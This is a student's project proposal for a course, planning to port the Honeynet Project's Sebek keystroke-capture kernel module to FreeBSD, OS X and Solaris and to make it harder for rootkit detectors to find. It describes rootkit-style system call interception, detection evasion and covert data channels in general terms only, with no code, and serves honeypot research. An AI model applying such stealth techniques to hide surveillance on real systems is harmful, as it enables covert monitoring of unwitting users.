CS 228 Project Proposal Write-Up SEBEK BSD, OS X, Solaris, Covertness Sebek is a part of the honeynet project (www.honeynet.org) designed to provide insight into the world of the hacker and cracker. Sebek's part is to capture session traffic, mainly keystrokes, when sniffers and intrusion detection systems are not useful. This mostly constitutes ssh and scp sessions due to their encrypted nature, but in the future necessity for sebek could be much more common. Sebek does this through a loadable kernel module and a few "helper applications". Sebek acts as a rootkit, where it loads into kernel memory space, intercepts system calls and captures any desired data entering the kernel from user applications (such as ssh). Currently sebek works in a beta-level on linux operating systems. I believe it is most commonly tested on and developed for RedHat Linux, but other flavors of the OS are also supported. My initial goal is to determine the degree of hardness for porting Sebek over to FreeBSD. More specifically, I will install and configure a normal FreeBSD 4.6.2 installation. I will then attempt to straight up compile and install sebek in its current form. Here I expect to run into compilation errors, as kernel functions and system calls may differ between the two. For this I will need to learn more about BSD programming. I already have a few good links into loadable kernel modules for BSD systems, which has given me a good start. If the porting to FreeBSD is not straight forward, that will take up my first few weeks into the course. Regardless of whether or not that takes a long time, once it has been completed I will try to port sebek over to Mac OSX. I believe this should be straightforward as OSX has a BSD core. Once this step has been completed, I plan to work on the covertness of sebek. Since sebek has the same traits as other, more malicious rootkits, there are plenty of rootkit detectors that would alert a hacker to the presence of it (and therefore alert them to the machine being a honeypot / honeynet). Another option is that once I the FreeBSD version working (and hopefully the OS X one as well), I could work on porting this system to Solaris. Solaris boxes have been good internet servers for a while and remarkly seem to still be doing alright. So that's what I assume my quarter of CS 228 to consist of. I plan on completing a few ports and possibly making sebek more stealthy / covert. If time permits, I hope to research a new way of sending data covertly through headers and other parts of various protocols.